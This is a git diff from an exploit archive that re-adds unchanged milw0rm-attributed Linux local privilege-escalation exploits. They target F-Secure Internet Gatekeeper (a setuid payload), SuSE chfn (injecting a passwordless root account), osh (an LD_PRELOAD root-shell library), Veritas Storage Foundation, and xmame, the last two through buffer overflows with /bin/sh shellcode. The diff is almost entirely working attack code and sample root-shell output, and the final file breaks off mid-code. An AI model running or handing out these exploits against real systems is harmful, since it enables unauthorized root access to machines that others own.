("-s", "--suid"): + if _exists(a): + _payload_ = _suid(a) + else: + print "[-] unable to access binary." + raise SystemExit + + if _dir_ == None: + print "[-] no directory was given [try -h for help menu]" + raise SystemExit + if _payload_ == None: + print "[-] enter binary to suid [try -h for help menu]" + raise SystemExit + _combined_ = "%s/%s" % (_dir_, _method_) + if not _exists(_combined_): + print "[-] method not possible, try another." + raise SystemExit + + print "[*] creating environment..." + try: + symlink('%s/%s' % (_dir_, _method_), 'runbad') + _write(_file_, _payload_) + except Exception, err: + raise SystemExit + + +def _suid(file): + _suid_ = """#!/bin/sh +chown 0.0 %(file)s +chmod 4755 %(file)s +""" % (locals()) + return _suid_ + + +def _clean(): + try: + files = ['runbad', 'ifconfig.cgi', 'reboot.cgi', 'proxy.cgi', + 'edittmpl.cgi', 'version.cgi', 'hostname.cgi', 'gateway.cgi', + 'halt.cgi', 'edituserdb.cgi', 'htpasswd.cgi', 'pattern_up.cgi', + 'license.cgi', 'iptables.cgi', 'dns.cgi', 'pattern_autoup.cgi', + 'spam_list.cgi', 'diag_suid.cgi'] + + for file in files: + if _exists(file): unlink(file) + + except Exception, err: + print "[-] %s" % (err), + + +############################################################################## +## main() // main code. +## + +def main(): + try: + print "[INFO] F-Secure Internet Gatekeeper for Linux <=2.10-431 local exploit by %s" % (__author__) + print "[*] handling options, arguments..." + _handleopts() + print "[*] executing exploit..." + system('./runbad') + print "[*] cleaning..." + _clean() + print "[*] done... try executing the specified binary." + except KeyboardInterrupt: + print "[-] caught keyboard interuption" + raise SystemExit + except Exception, (err): + _clean() + raise SystemExit + +if __name__ == '__main__': main() + +# milw0rm.com [2005-11-07] diff --git a/platforms/linux/local/1299.sh b/platforms/linux/local/1299.sh index 0afd59b0d..54dc2972b 100755 --- a/platforms/linux/local/1299.sh +++ b/platforms/linux/local/1299.sh @@ -1,37 +1,37 @@ -#!/bin/sh -# -# Exploit for SuSE Linux 9.{1,2,3}/10.0, Desktop 1.0, UnitedLinux 1.0 -# and SuSE Linux Enterprise Server {8,9} 'chfn' local root bug. -# -# by Hunger -# -# Advistory: -# http://lists.suse.com/archive/suse-security-announce/2005-Nov/0002.html -# -# hunger@suse:~> id -# uid=1000(hunger) gid=1000(hunger) groups=1000(hunger) -# hunger@suse:~> ./susechfn.sh -# Type your current password to get root... :) -# Password: -# sh-2.05b# id -# uid=0(r00t) gid=0(root) groups=0(root) - -if [ X"$SHELL" = "X" ]; then - echo "No SHELL environment, using /bin/sh for default." - export SHELL=/bin/sh -fi - -if [ -u /usr/bin/chfn ]; then - /bin/echo "Type your current password to get root... :)" - /usr/bin/chfn -h "`echo -e ':/:'$SHELL'\nr00t::0:0:'`" $USER > /dev/null - if [ -u /bin/su ]; then - /bin/su r00t - /bin/echo "You can get root again with 'su r00t'" - else - echo "/bin/su file is not setuid root :(" - fi -else -echo "/usr/bin/chfn file is not setuid root :(" -fi - -# milw0rm.com [2005-11-08] +#!/bin/sh +# +# Exploit for SuSE Linux 9.{1,2,3}/10.0, Desktop 1.0, UnitedLinux 1.0 +# and SuSE Linux Enterprise Server {8,9} 'chfn' local root bug. +# +# by Hunger +# +# Advistory: +# http://lists.suse.com/archive/suse-security-announce/2005-Nov/0002.html +# +# hunger@suse:~> id +# uid=1000(hunger) gid=1000(hunger) groups=1000(hunger) +# hunger@suse:~> ./susechfn.sh +# Type your current password to get root... :) +# Password: +# sh-2.05b# id +# uid=0(r00t) gid=0(root) groups=0(root) + +if [ X"$SHELL" = "X" ]; then + echo "No SHELL environment, using /bin/sh for default." + export SHELL=/bin/sh +fi + +if [ -u /usr/bin/chfn ]; then + /bin/echo "Type your current password to get root... :)" + /usr/bin/chfn -h "`echo -e ':/:'$SHELL'\nr00t::0:0:'`" $USER > /dev/null + if [ -u /bin/su ]; then + /bin/su r00t + /bin/echo "You can get root again with 'su r00t'" + else + echo "/bin/su file is not setuid root :(" + fi +else +echo "/usr/bin/chfn file is not setuid root :(" +fi + +# milw0rm.com [2005-11-08] diff --git a/platforms/linux/local/1300.sh b/platforms/linux/local/1300.sh index 8fda60552..85632f9be 100755 --- a/platforms/linux/local/1300.sh +++ b/platforms/linux/local/1300.sh @@ -1,107 +1,107 @@ -#!/bin/sh -# -# OSH 1.7-14 Exploit -# -# EDUCATIONAL purposes only.... :-) -# -# by Charles Stevenson (core) -# -# Description: -# The Operator Shell (Osh) is a setuid root, security enhanced, restricted -# shell. It allows the administrator to carefully limit the access of special -# commands and files to the users whose duties require their use, while -# at the same time automatically maintaining audit records. The configuration -# file for Osh contains an administrator defined access profile for each -# authorized user or group. -# -# Problem discovered and described by Solar Eclipse: -# -# main.c:439 -# -# if (gettoken(env, MAXENV)!=TWORD) { -# fprintf(stderr,"Illegal or too long environment variable\n"); -# break; -# } -# if ((env2=getenv(env))==NULL) { -# char temp[255]; -# char *temp2; -# -# strcpy(temp,env); -# if ((temp2=(char *)strrchr(temp,'/'))!=NULL) { -# if (temp2!=temp) -# *temp2='\0'; -# else -# *(temp2+1)='\0'; -# if ((env2=getenv(temp))!=NULL) { -# strcat(env2,"/"); -# strcat(env2,temp2+1); -# } -# } -# } -# -# exploit: -# -# This code is used to handle substitutions of environmental -# variables. If the first call to getenv() fails, we might have a case -# like $VAR/filename, so we find the last '/' character and replace -# it with '\0'. Then we call getenv() on the shortened variable and -# append "/filename" to it. The problem is that the return value of -# getenv() is a NULL terminated string on the stack and by appending -# to it we will overwriting the data after the string. -# -# This bug allows us to overwrite one of the environmental variables -# passed to the child process. If we set the environmental variable -# $VAR to the string "a" before executing osh, and then pass -# "$VAR/LD_PRELOAD=evil.so" as a command line parameter, the above -# code will overwrite the value of some environmental variable located -# after $VAR with LD_PRELOAD=evil.so. Then osh will execute an -# external non-suid program and the code in evil.so will be executed. -# -# I have not tested this, but it looks like a really cool bug. -# -# Risk: Medium since user would have to be in the operator group which -# the admin would have to grant explicitly and I assume would be -# a trustworthy individual ;-) -# -# Then again the last two have been classified as "urgency=high" -# according to Debian policy. Truly sorry to cause Oohara Yuuma -# so much work. You really should orphan this package ;) -# -# Solution: -# apt-get --purge remove osh -# -# greetz to solar eclipse, nemo, andrewg, arcanum, mercy, amnesia, -# banned-it, capsyl, sloth, ben, KF, akt0r, MRX, salvia, thn -# -# irc.pulltheplug.org (#social) -# 0dd: much <3 & respect -# -# Obligatory screenshot: -# core@charity:~/hacking/sploits$ dpkg -l osh|grep ^ii -# ii osh 1.7-14 Operator's Shell -# core@charity:~/hacking/sploits$ ./x_osh3.sh -# telnet: could not resolve /home/core/LD_PRELOAD=ownall.so/telnet: Name or service not known -# sh-3.00# id -# uid=0(root) gid=0(root) groups=0(root) - - -cd /tmp; cat >ownall.c < - * greetz Solar Eclipse, 0dd, irc.pulltheplug.org (#social) */ -#include -#include -int close(int fd) { - gid_t groupsex = 0; /* osh isn't gettin' any tonight */ - setuid(0); /* Not really needed but make uid root */ - setgid(0); /* Set gid root too! */ - setgroups((size_t)1,&groupsex); /* This makes my pastes cooler looking */ - clearenv(); /* LD_PRELOAD was causing headaches ;) */ - execl("/bin/sh","/bin/sh",NULL); - return 0; -} -EOF -gcc -shared -o ownall.so ownall.c -osh telnet -l '$USER/LD_LIBRARY_PATH=.' '$HOME/LD_PRELOAD=ownall.so' -rm -f ownall* - -# milw0rm.com [2005-11-09] +#!/bin/sh +# +# OSH 1.7-14 Exploit +# +# EDUCATIONAL purposes only.... :-) +# +# by Charles Stevenson (core) +# +# Description: +# The Operator Shell (Osh) is a setuid root, security enhanced, restricted +# shell. It allows the administrator to carefully limit the access of special +# commands and files to the users whose duties require their use, while +# at the same time automatically maintaining audit records. The configuration +# file for Osh contains an administrator defined access profile for each +# authorized user or group. +# +# Problem discovered and described by Solar Eclipse: +# +# main.c:439 +# +# if (gettoken(env, MAXENV)!=TWORD) { +# fprintf(stderr,"Illegal or too long environment variable\n"); +# break; +# } +# if ((env2=getenv(env))==NULL) { +# char temp[255]; +# char *temp2; +# +# strcpy(temp,env); +# if ((temp2=(char *)strrchr(temp,'/'))!=NULL) { +# if (temp2!=temp) +# *temp2='\0'; +# else +# *(temp2+1)='\0'; +# if ((env2=getenv(temp))!=NULL) { +# strcat(env2,"/"); +# strcat(env2,temp2+1); +# } +# } +# } +# +# exploit: +# +# This code is used to handle substitutions of environmental +# variables. If the first call to getenv() fails, we might have a case +# like $VAR/filename, so we find the last '/' character and replace +# it with '\0'. Then we call getenv() on the shortened variable and +# append "/filename" to it. The problem is that the return value of +# getenv() is a NULL terminated string on the stack and by appending +# to it we will overwriting the data after the string. +# +# This bug allows us to overwrite one of the environmental variables +# passed to the child process. If we set the environmental variable +# $VAR to the string "a" before executing osh, and then pass +# "$VAR/LD_PRELOAD=evil.so" as a command line parameter, the above +# code will overwrite the value of some environmental variable located +# after $VAR with LD_PRELOAD=evil.so. Then osh will execute an +# external non-suid program and the code in evil.so will be executed. +# +# I have not tested this, but it looks like a really cool bug. +# +# Risk: Medium since user would have to be in the operator group which +# the admin would have to grant explicitly and I assume would be +# a trustworthy individual ;-) +# +# Then again the last two have been classified as "urgency=high" +# according to Debian policy. Truly sorry to cause Oohara Yuuma +# so much work. You really should orphan this package ;) +# +# Solution: +# apt-get --purge remove osh +# +# greetz to solar eclipse, nemo, andrewg, arcanum, mercy, amnesia, +# banned-it, capsyl, sloth, ben, KF, akt0r, MRX, salvia, thn +# +# irc.pulltheplug.org (#social) +# 0dd: much <3 & respect +# +# Obligatory screenshot: +# core@charity:~/hacking/sploits$ dpkg -l osh|grep ^ii +# ii osh 1.7-14 Operator's Shell +# core@charity:~/hacking/sploits$ ./x_osh3.sh +# telnet: could not resolve /home/core/LD_PRELOAD=ownall.so/telnet: Name or service not known +# sh-3.00# id +# uid=0(root) gid=0(root) groups=0(root) + + +cd /tmp; cat >ownall.c < + * greetz Solar Eclipse, 0dd, irc.pulltheplug.org (#social) */ +#include +#include +int close(int fd) { + gid_t groupsex = 0; /* osh isn't gettin' any tonight */ + setuid(0); /* Not really needed but make uid root */ + setgid(0); /* Set gid root too! */ + setgroups((size_t)1,&groupsex); /* This makes my pastes cooler looking */ + clearenv(); /* LD_PRELOAD was causing headaches ;) */ + execl("/bin/sh","/bin/sh",NULL); + return 0; +} +EOF +gcc -shared -o ownall.so ownall.c +osh telnet -l '$USER/LD_LIBRARY_PATH=.' '$HOME/LD_PRELOAD=ownall.so' +rm -f ownall* + +# milw0rm.com [2005-11-09] diff --git a/platforms/linux/local/1316.pl b/platforms/linux/local/1316.pl index 1cacd3bcb..ecdd00d2f 100755 --- a/platforms/linux/local/1316.pl +++ b/platforms/linux/local/1316.pl @@ -1,66 +1,66 @@ -#!/usr/bin/perl -w -# -# Veritas Storage Foundation 4.0 -# -# http://www.digitalmunition.com -# kf (kf_lists[at]digitalmunition[dot]com) - 08/19/2005 -# -# This bug has not been patched as of: -# Q14438H.sf.4.0.00.0.rhel3_i686.tar.gz -# -# Make sure you don't get your sploits from some -# Frenchie at FR-SIRT go to milw0rm instead. -# -$retval = 0xbffffc17; - -$tgts{"0"} = "/opt/VRTSvcs/bin/haagent:72"; -$tgts{"1"} = "/opt/VRTSvcs/bin/haalert:72"; -$tgts{"2"} = "/opt/VRTSvcs/bin/haattr:72"; -$tgts{"3"} = "/opt/VRTSvcs/bin/hacli:72"; -$tgts{"4"} = "/opt/VRTSvcs/bin/hareg:72"; -$tgts{"5"} = "/opt/VRTSvcs/bin/haclus:72"; -$tgts{"6"} = "/opt/VRTSvcs/bin/haconf:72"; -$tgts{"7"} = "/opt/VRTSvcs/bin/hadebug:72"; -$tgts{"8"} = "/opt/VRTSvcs/bin/hagrp:72"; -$tgts{"9"} = "/opt/VRTSvcs/bin/hahb:72"; -$tgts{"10"} = "/opt/VRTSvcs/bin/halog:72"; -$tgts{"11"} = "/opt/VRTSvcs/bin/hares:72"; -$tgts{"12"} = "/opt/VRTSvcs/bin/hastatus:72"; -$tgts{"13"} = "/opt/VRTSvcs/bin/hasys:72"; -$tgts{"14"} = "/opt/VRTSvcs/bin/hatype:72"; -$tgts{"15"} = "/opt/VRTSvcs/bin/hauser:72"; -$tgts{"16"} = "/opt/VRTSvcs/bin/tststew:72"; - -unless (($target) = @ARGV) { - - print "\n Veritas Storage Foundation VCSI18N_LANG overflow, kf \(kf_lists[at]digitalmunition[dot]com\) - 08/19/2005\n"; - print "\n\nUsage: $0 \n\nTargets:\n\n"; - - foreach $key (sort(keys %tgts)) { - ($a,$b) = split(/\:/,$tgts{"$key"}); - print "\t$key . $a\n"; - } - - print "\n"; - exit 1; -} - -$ret = pack("l", ($retval)); -($a,$b) = split(/\:/,$tgts{"$target"}); -print "*** Target: $a, Len: $b\n\n"; - -$sc = "\x90"x1024; -$sc .= "\x31\xd2\x31\xc9\x31\xdb\x31\xc0\xb0\xa4\xcd\x80"; -$sc .= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"; -$sc .= "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"; -$sc .= "\x80\xe8\xdc\xff\xff\xff/bin/sh"; - -$buf = "A" x $b; -$buf .= "$ret" x 2; - -$ENV{"VCSI18N_LANG"} = $buf; -$ENV{"DMR0x"} = $sc; - -exec("$a DMR0x"); - -# milw0rm.com [2005-11-12] +#!/usr/bin/perl -w +# +# Veritas Storage Foundation 4.0 +# +# http://www.digitalmunition.com +# kf (kf_lists[at]digitalmunition[dot]com) - 08/19/2005 +# +# This bug has not been patched as of: +# Q14438H.sf.4.0.00.0.rhel3_i686.tar.gz +# +# Make sure you don't get your sploits from some +# Frenchie at FR-SIRT go to milw0rm instead. +# +$retval = 0xbffffc17; + +$tgts{"0"} = "/opt/VRTSvcs/bin/haagent:72"; +$tgts{"1"} = "/opt/VRTSvcs/bin/haalert:72"; +$tgts{"2"} = "/opt/VRTSvcs/bin/haattr:72"; +$tgts{"3"} = "/opt/VRTSvcs/bin/hacli:72"; +$tgts{"4"} = "/opt/VRTSvcs/bin/hareg:72"; +$tgts{"5"} = "/opt/VRTSvcs/bin/haclus:72"; +$tgts{"6"} = "/opt/VRTSvcs/bin/haconf:72"; +$tgts{"7"} = "/opt/VRTSvcs/bin/hadebug:72"; +$tgts{"8"} = "/opt/VRTSvcs/bin/hagrp:72"; +$tgts{"9"} = "/opt/VRTSvcs/bin/hahb:72"; +$tgts{"10"} = "/opt/VRTSvcs/bin/halog:72"; +$tgts{"11"} = "/opt/VRTSvcs/bin/hares:72"; +$tgts{"12"} = "/opt/VRTSvcs/bin/hastatus:72"; +$tgts{"13"} = "/opt/VRTSvcs/bin/hasys:72"; +$tgts{"14"} = "/opt/VRTSvcs/bin/hatype:72"; +$tgts{"15"} = "/opt/VRTSvcs/bin/hauser:72"; +$tgts{"16"} = "/opt/VRTSvcs/bin/tststew:72"; + +unless (($target) = @ARGV) { + + print "\n Veritas Storage Foundation VCSI18N_LANG overflow, kf \(kf_lists[at]digitalmunition[dot]com\) - 08/19/2005\n"; + print "\n\nUsage: $0 \n\nTargets:\n\n"; + + foreach $key (sort(keys %tgts)) { + ($a,$b) = split(/\:/,$tgts{"$key"}); + print "\t$key . $a\n"; + } + + print "\n"; + exit 1; +} + +$ret = pack("l", ($retval)); +($a,$b) = split(/\:/,$tgts{"$target"}); +print "*** Target: $a, Len: $b\n\n"; + +$sc = "\x90"x1024; +$sc .= "\x31\xd2\x31\xc9\x31\xdb\x31\xc0\xb0\xa4\xcd\x80"; +$sc .= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"; +$sc .= "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"; +$sc .= "\x80\xe8\xdc\xff\xff\xff/bin/sh"; + +$buf = "A" x $b; +$buf .= "$ret" x 2; + +$ENV{"VCSI18N_LANG"} = $buf; +$ENV{"DMR0x"} = $sc; + +exec("$a DMR0x"); + +# milw0rm.com [2005-11-12] diff --git a/platforms/linux/local/1412.rb b/platforms/linux/local/1412.rb index 4c7879d81..fad51a53e 100755 --- a/platforms/linux/local/1412.rb +++ b/platforms/linux/local/1412.rb @@ -1,34 +1,34 @@ -#!/usr/bin/ruby - -# -# One of the PoC code for xmame "-lang" options. -# Advisory is base on : http://kerneltrap.org/node/6055 -# -# by xwings at mysec dot org -# url : http://www.mysec.org , new website - -# Tested on : -# Linux debian24 2.4.27-2-386 #1 Mon May 16 16:47:51 JST 2005 i686 GNU/Linux -# gcc version 4.0.3 20060104 (prerelease) (Ubuntu 4.0.2-6ubuntu1) -# xmame 0.102 , ./configure && make && make install -# - - -#setreuid(geteuid(),geteuid()) execl(); executes /bin//sh 49 bytes. -shellcode = "\x31\xc9\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0"+ - "\x46\xcd\x80\x31\xc9\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"+ - "\x6e\x89\xe3\x51\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\xb0\x01"+ - "\x31\xdb\xcd\x80" - -vulnpath = "/usr/games/xmame.x11" -argvopt = "-lang" - -ret = (0xbfffe8da) -retadd = ([ret].pack('V')) - -nops = ("\x90" * (1056 - (shellcode.length + retadd.length))) -buffer = nops+shellcode+retadd - -system(vulnpath,argvopt,buffer) - -# milw0rm.com [2006-01-10] +#!/usr/bin/ruby + +# +# One of the PoC code for xmame "-lang" options. +# Advisory is base on : http://kerneltrap.org/node/6055 +# +# by xwings at mysec dot org +# url : http://www.mysec.org , new website + +# Tested on : +# Linux debian24 2.4.27-2-386 #1 Mon May 16 16:47:51 JST 2005 i686 GNU/Linux +# gcc version 4.0.3 20060104 (prerelease) (Ubuntu 4.0.2-6ubuntu1) +# xmame 0.102 , ./configure && make && make install +# + + +#setreuid(geteuid(),geteuid()) execl(); executes /bin//sh 49 bytes. +shellcode = "\x31\xc9\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0"+ + "\x46\xcd\x80\x31\xc9\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"+ + "\x6e\x89\xe3\x51\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\xb0\x01"+ + "\x31\xdb\xcd\x80" + +vulnpath = "/usr/games/xmame.x11" +argvopt = "-lang" + +ret = (0xbfffe8da) +retadd = ([ret].pack('V')) + +nops = ("\x90" * (1056 - (shellcode.length + retadd.length))) +buffer = nops+shellcode+retadd + +system(vulnpath,argvopt,buffer) + +# milw0rm.com [2006-01-10] diff --git a/platforms/linux/local/1415.c b/platforms/linux/local/1415.c index f97705172..955f11e27 100755 --- a/platforms/linux/local/1415.c +++ b/platforms/linux/local/1415.c @@ -1,98 +1,98 @@ -/* - Xmame 0.102 (-lang) Local Buffer Overflow Exploit - Coded BY Qnix - Qnix@bsdmail.org - #0x11 @EFNET - icq : 234263 - 0x11.org - Advisory : http://kerneltrap.org/node/6055 - -e.g: - -Qnix ~ # ./exploit /usr/games/bin/xmame.x11 -************************************************** -Xmame 0.102 (-lang) Local Buffer Overflow Exploit -Coded BY Qnix -************************************************** - - (~) Stack pointer (ESP) : 0xbffff688 - (~) Offset from ESP : 0x0 - (~) Desired Return Addr : 0xbffff688 - -GLINFO: loaded OpenGL library libGL.so! -GLINFO: loaded GLU library libGLU.so! -GLINFO: glPolygonOffsetEXT (2): not implemented ! -info: trying to parse: /usr/share/games/xmame/xmamerc -info: trying to parse: /root/.xmame/xmamerc -info: trying to parse: /usr/share/games/xmame/xmame-x11rc -info: trying to parse: /root/.xmame/xmame-x11rc -info: trying to parse: /usr/share/games/xmame/rc/robbyrc -info: trying to parse: /root/.xmame/rc/robbyrc -sh-3.00# - -*/ - -#include -#include - -#define BUFSIZE 1057 -#define NS 600 - -char shellcode[] = -"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0" -"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d" -"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73" -"\x68"; - -unsigned long sp(void) -{ __asm__("movl %esp, %eax");} - -int main(int argc, char *argv[]) -{ - int i, offset; - long esp, ret, *addr_ptr; - char *buffer, *ptr; - - offset = 0; - esp = sp(); - ret = esp - offset; - - if(argc < 2 || argc != 2) - { - fprintf(stderr,"%s \n",argv[0]); - return(0); - } - - fprintf(stdout,"**************************************************\n"); - fprintf(stdout,"Xmame 0.102 (-lang) Local Buffer Overflow Exploit\n"); - fprintf(stdout,"Coded BY Qnix\n"); - fprintf(stdout,"**************************************************\n\n"); - fprintf(stdout,"\t(~) Stack pointer (ESP) : 0x%x\n", esp); - fprintf(stdout,"\t(~) Offset from ESP : 0x%x\n", offset); - fprintf(stdout,"\t(~) Desired Return Addr : 0x%x\n\n", ret); - - buffer = malloc(BUFSIZE); - - ptr = buffer; - addr_ptr = (long *) ptr; - for(i=0; i < BUFSIZE; i+=4) - { *(addr_ptr++) = ret; } - - for(i=0; i < NS; i++) - { buffer[i] = '\x90'; } - - ptr = buffer + NS; - for(i=0; i < strlen(shellcode); i++) - { *(ptr++) = shellcode[i]; } - - buffer[BUFSIZE-1] = 0; - - execl(argv[1], "xmame.x11", "-lang", buffer, 0); - - free(buffer); - - return(0); - -} - -// milw0rm.com [2006-01-13] +/* + Xmame 0.102 (-lang) Local Buffer Overflow Exploit + Coded BY Qnix + Qnix@bsdmail.org + #0x11 @EFNET + icq : 234263 + 0x11.org + Advisory : http://kerneltrap.org/node/6055 + +e.g: + +Qnix ~ # ./exploit /usr/games/bin/xmame.x11 +************************************************** +Xmame 0.102 (-lang) Local Buffer Overflow Exploit +Coded BY Qnix +************************************************** + + (~) Stack pointer (ESP) : 0xbffff688 + (~) Offset from ESP : 0x0 + (~) Desired Return Addr : 0xbffff688 + +GLINFO: loaded OpenGL library libGL.so! +GLINFO: loaded GLU library libGLU.so! +GLINFO: glPolygonOffsetEXT (2): not implemented ! +info: trying to parse: /usr/share/games/xmame/xmamerc +info: trying to parse: /root/.xmame/xmamerc +info: trying to parse: /usr/share/games/xmame/xmame-x11rc +info: trying to parse: /root/.xmame/xmame-x11rc +info: trying to parse: /usr/share/games/xmame/rc/robbyrc +info: trying to parse: /root/.xmame/rc/robbyrc +sh-3.00# + +*/ + +#include +#include + +#define BUFSIZE 1057 +#define NS 600 + +char shellcode[] = +"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0" +"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d" +"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73" +"\x68"; + +unsigned long sp(void) +{ __asm__("movl %esp, %eax");} + +int main(int argc, char *argv[]) +{ + int i, offset; + long esp, ret, *addr_ptr; + char *buffer, *ptr; + + offset = 0; + esp = sp(); + ret = esp - offset; + + if(argc < 2 || argc != 2) + { + fprintf(stderr,"%s \n",argv[0]); + return(0); + } + + fprintf(stdout,"**************************************************\n"); + fprintf(stdout,"Xmame 0.102 (-lang) Local Buffer Overflow Exploit\n"); + fprintf(stdout,"Coded BY Qnix\n"); + fprintf(stdout,"**************************************************\n\n"); + fprintf(stdout,"\t(~) Stack pointer (ESP) : 0x%x\n", esp); + fprintf(stdout,"\t(~) Offset from ESP : 0x%x\n", offset); + fprintf(stdout,"\t(~) Desired Return Addr : 0x%x\n\n", ret); + + buffer = malloc(BUFSIZE); + + ptr = buffer; + addr_ptr = (long *) ptr; + for(i=0; i < BUFSIZE; i+=4) + { *(addr_ptr++) = ret; } + + for(i=0; i < NS; i++) + { buffer[i] = '\x90'; } + + ptr = buffer + NS; + for(i=0; i < strlen(shellcode); i++) + { *(ptr++) = shellcode[i]; } + + buffer[BUFSIZE-1] = 0; + + execl(argv[1], "xmame.x11", "-lang", buffer, 0); + + free(buffer); + + return(0); + +} + +// milw0rm.com [2006-01-13] diff --git a/platforms/linux/local/1425.c b/platforms/linux/local/1425.c index a928a2766..5c556aa21 100755 --- a/platforms/linux/local/1425.c +++ b/platforms/linux/local/1425.c @@ -1,112 +1,112 @@ -/* xmame-expl.c - * by - * sj (sj@2600.com) - * - * On 20th of Jan it came to my attention that Xmame suffered from several - * buffer overflow problems. Thinking this issue was resolved, I installed - * Xmame on my Ubuntu laptop, from the Ubuntu repositories which installed a - * vulnerable version of Xmame. - * This is what prompted me to write this exploit. I realise there is a - * ruby exploit out there, but that did not exploit my system, hence - * another reason to write this exploit. - * - * This code exploits Xmame 0.102 and below. - * - * The shellcode used in this exploit is taken from Mixter's buffer - * overflow tutorial which can be found here: http://mixter.void.ru/exploit.html - * - * Based on what arguments you supply, this code will exploit 3 of - * the vulnerabilities found in Xmame giving you an euid=0 - * Read the usage. - * - * Example: - * sj@tsunami:~/audit$ gcc -o xmame-expl xmame-expl.c - * sj@tsunami:~/audit$ ./xmame-expl 1 - * Using -pb overflow method - * info: trying to parse: /etc/xmame/xmamerc - * error: /etc/xmame/xmamerc(71): unknown option joyusb-calibrate, ignoring line - * info: trying to parse: /home/sj/.xmame/xmamerc - * info: trying to parse: /etc/xmame/xmame-x11rc - * info: trying to parse: /home/sj/.xmame/xmame-x11rc - * sh-3.00$ id - * uid=1000(sj) gid=1000(sj) egid=0(root) - * groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(lpadmin),108(scanner),109(admin),1000(sj) - * sh-3.00$ - * - * Enjoy (: - */ - -#include -#include - -char shellcode[]="\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d" - "\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58"; - -unsigned long sp(void) -{__asm__("movl %esp, %eax");} - -void usage() { - fprintf(stderr,"Usage: ./xmame-expl \n"); - fprintf(stderr,"buffers:\n -pb [1]"); - fprintf(stderr,"\n -lang [2]"); - fprintf(stderr,"\n -rec [3]"); - fprintf(stderr,"\nExample: ./xmame-expl 1 \n"); -} - - -int main(int argc, char *argv[]) -{ - - int i, offset, input, size; - long esp, ret; - long *addr_ptr; - char *buf, *ptr, *f; - offset = 0; - esp = sp(); - ret = esp - offset; - - if(argc != 2) { - usage(); - return 1; - } - input=atoi(argv[1]); - switch(input) { - case 1: printf("Using -pb overflow method\n"); - size=1037; - f="-pb"; - break; - case 2: printf("Using -lang overflow method\n"); - size=1057; - f="-lang"; - break; - case 3: printf("Using -rec overflow method\n"); - size=1057; - f="-rec"; - break; - - default: usage(); - return 1; - } - buf=malloc(size); - ptr = buf; - addr_ptr = (long *) ptr; - for(i=0; i +#include + +char shellcode[]="\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d" + "\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58"; + +unsigned long sp(void) +{__asm__("movl %esp, %eax");} + +void usage() { + fprintf(stderr,"Usage: ./xmame-expl \n"); + fprintf(stderr,"buffers:\n -pb [1]"); + fprintf(stderr,"\n -lang [2]"); + fprintf(stderr,"\n -rec [3]"); + fprintf(stderr,"\nExample: ./xmame-expl 1 \n"); +} + + +int main(int argc, char *argv[]) +{ + + int i, offset, input, size; + long esp, ret; + long *addr_ptr; + char *buf, *ptr, *f; + offset = 0; + esp = sp(); + ret = esp - offset; + + if(argc != 2) { + usage(); + return 1; + } + input=atoi(argv[1]); + switch(input) { + case 1: printf("Using -pb overflow method\n"); + size=1037; + f="-pb"; + break; + case 2: printf("Using -lang overflow method\n"); + size=1057; + f="-lang"; + break; + case 3: printf("Using -rec overflow method\n"); + size=1057; + f="-rec"; + break; + + default: usage(); + return 1; + } + buf=malloc(size); + ptr = buf; + addr_ptr = (long *) ptr; + for(i=0; i -#include -#include -#include - -char shellcode[] = -/* Set gid */ - "\x90\x90\x90\x90\x90\x90\x90" -"\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1\x2b\x31\xc0\xb0\x47\xcd\x80" -"\x31\xdb\x31\xc9\xb3\x2b\xb1\x2b\x31\xc0\xb0\x47\xcd\x80" - -/* execve() */ -"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" -"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" -"\x80\xe8\xdc\xff\xff\xff/bin/sh"; - - -unsigned long ret = 0xd096edb7; -unsigned long shell = 0xbfffebfd; - - - -int main(void) -{ - char *first, *last, *ptr; - char a[4], b[4]; - int slen = strlen(shellcode); - - if (!(first = (char *)malloc(4165))) - { - printf("%s:%d Could not allocate required memory\n", __FILE__, __LINE__); - exit(-1); - } - - - if (!(last = (char *)malloc(16))) - { - printf("%s:%d Could not allocate required memory\n", __FILE__, __LINE__); - exit(-1); - } - - if (!(ptr = (char *)malloc(4183))) - { - printf("%s:%d Could not allocate required memory\n", __FILE__, __LINE__); - exit(-1); - } - - strcpy(first, shellcode); - memset(first+slen, 'A', 4162-slen); - memset(last, 'A', 12); - first[4162] = '\0'; - last[12] = '\0'; - - a[0] = (ret >> 24) & 0xff; - a[1] = (ret >> 16) & 0xff; - a[2] = (ret >> 8) & 0xff; - a[3] = (ret) & 0xff; - - - b[0] = (shell >> 24) & 0xff; - b[1] = (shell >> 16) & 0xff; - 